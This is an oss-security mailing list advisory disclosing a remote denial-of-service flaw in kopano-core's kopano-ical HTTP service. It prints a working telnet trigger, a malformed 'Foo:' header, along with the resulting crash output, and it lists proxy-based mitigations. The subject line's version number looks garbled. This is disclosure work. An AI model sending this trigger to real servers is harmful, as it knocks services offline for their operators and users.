Date: Fri, 2 Apr 2021 10:26:29 +0200 (CEST) From: Jan Engelhardt <jengelh@...i.de> To: oss-security@...ts.openwall.com Subject: kopano-core 126.96.36.199: Remote DoS with out-of-bounds access Initial publication, no CVE number yet. # Affected versions * kopano-core 11.0.1 * kopano-core 8.7.20 * it is believed this affects all other versions too, including 10.0.7, 9.1.0, and zarafa 7.2.6. The "kopano-ical" program implements a network service/trivial HTTP server. It fails to properly check HTTP headers, and with a crafted request, can be exploited to drive the process into an exception and have it terminate. # Trigger » ./kopano-ical -F & » telnet localhost 8000 Trying ::1... Connected to localhost. Escape character is '^]'. GET / HTTP/1.0 Foo: Connection closed by foreign host. terminate called after throwing an instance of 'std::out_of_range' what(): basic_string::substr: __pos (which is 6) > this->size() (which is 5) # Mitigation In conjunction with a proxy, the issue does not occur as they often filter lines (LF->CRLF, giving an extra byte). Tested ones: nginx-1.19.8 squid-4.14 apache2-2.4.46 tinyproxy-1.10.0
Powered by blists - more mailing lists
Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.
Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.